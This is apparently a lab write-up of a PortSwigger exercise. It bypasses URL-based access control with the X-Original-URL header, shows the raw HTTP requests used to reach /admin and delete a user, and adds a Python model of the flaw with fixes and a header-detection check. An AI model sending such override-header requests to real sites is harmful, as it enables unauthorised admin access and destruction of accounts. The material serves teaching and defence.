URL-based access control can be circumvented
This website has an unauthenticated admin panel at /admin, but a front-end system has been configured to block external access to that path. However, the back-end application is built on a framework that supports the X-Original-URL header.
Attempting to access /admin directly was blocked. The response was plain and terse, which suggested it came from the front-end system rather than from the application itself. To investigate, I sent the request to Burp Repeater, changed the request line to / and added the header X-Original-URL: /example. This produced a "Not Found" response, showing that the back-end processes the X-Original-URL header and routes on its value.
GET / HTTP/2
Host: ****.web-security-academy.net
X-Original-Url: /example
The response was:
HTTP/2 404 Not Found
Content-Type: application/json; charset=utf-8
Set-Cookie: session=****; Secure; HttpOnly; SameSite=None
X-Frame-Options: SAMEORIGIN
Content-Length: 11
"Not Found"
Next, I changed the X-Original-URL value to /admin, which gave access to the admin page. To delete the user "carlos", I appended ?username=carlos to the real query string on the request line and set the X-Original-URL path to /admin/delete. That request passed the front-end block, deleted the user "carlos", and solved the lab.
GET /?username=carlos HTTP/2
Host: ****.web-security-academy.net
X-Original-Url: /admin/delete
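The following is an added example, not code from the lab or from PortSwigger. It models the front-end/back-end split described above as plain functions: a front-end ACL that looks only at the request-line path, a back-end that honors override headers (so the header value replaces the routed path, and the query string still comes from the real request line), and the two fixes a defender would apply, a back-end that routes strictly on the request line and a front-end that strips override headers before forwarding. The blocked prefix, the header name X-Rewrite-URL as a sibling of X-Original-URL, and the routes are constructed for this example.

```python
"""Added example (not the lab's or PortSwigger's code): toy model of a
URL-based access control that is defeated by an override header, with fixes."""
from typing import Callable, Dict, Tuple
from urllib.parse import parse_qs

# Paths the front-end refuses to forward (constructed for this example).
BLOCKED_PREFIXES = ("/admin",)
# Override headers some back-end frameworks treat as "the real URL".
# X-Original-URL is the one from the write-up; X-Rewrite-URL is an assumed sibling.
OVERRIDE_HEADERS = ("x-original-url", "x-rewrite-url")

Headers = Dict[str, str]
Backend = Callable[[str, Headers], str]


def front_end_allows(path: str) -> bool:
    """Front-end ACL: decides only on the request-line path, never on headers."""
    return not any(path.startswith(p) for p in BLOCKED_PREFIXES)


def find_override_headers(headers: Headers) -> list:
    """Names of override headers present, case-insensitively (useful for logging/alerting)."""
    return [k for k in headers if k.lower() in OVERRIDE_HEADERS]


def backend_vulnerable(path: str, headers: Headers) -> str:
    """Back-end that honors override headers: the header value replaces the routed path."""
    for name in find_override_headers(headers):
        return headers[name]
    return path


def backend_hardened(path: str, headers: Headers) -> str:
    """Back-end fix: route strictly on the request-line path; override headers are ignored."""
    return path


def strip_override_headers(headers: Headers) -> Headers:
    """Front-end fix: drop override headers before forwarding, whatever their case."""
    drop = set(find_override_headers(headers))
    return {k: v for k, v in headers.items() if k not in drop}


def handle(path: str, query: str, headers: Headers, backend: Backend) -> Tuple[int, str]:
    """Front-end check, then back-end routing. Returns (status, body)."""
    if not front_end_allows(path):
        return 403, "blocked by front-end"
    route = backend(path, headers)
    if route == "/":
        return 200, "home"
    if route == "/admin":
        return 200, "admin panel"
    if route == "/admin/delete":
        # The query string is taken from the real request line, not from the
        # header, which is why the write-up appends ?username=carlos to the URL.
        user = parse_qs(query).get("username", [""])[0]
        if not user:
            return 400, "missing username"
        return 200, f"deleted {user}"
    return 404, "Not Found"


if __name__ == "__main__":
    hdr = {"Host": "example.test", "X-Original-Url": "/admin"}  # constructed request headers
    print(handle("/admin", "", {}, backend_vulnerable))                  # front-end blocks
    print(handle("/", "", hdr, backend_vulnerable))                       # header bypasses block
    print(handle("/", "", hdr, backend_hardened))                         # back-end fix: home
    print(handle("/", "", strip_override_headers(hdr), backend_vulnerable))  # front-end fix: home
    print("override headers seen:", find_override_headers(hdr))          # what to log/alert on
```

Either fix alone closes this particular bypass; applying both is the usual recommendation, because a front-end filter that strips a fixed header list is only as good as the list, while a back-end that never trusts client-supplied routing headers is immune regardless of what the proxy forwards. The `find_override_headers` check is also what a front-end or WAF would log to detect probing of this kind.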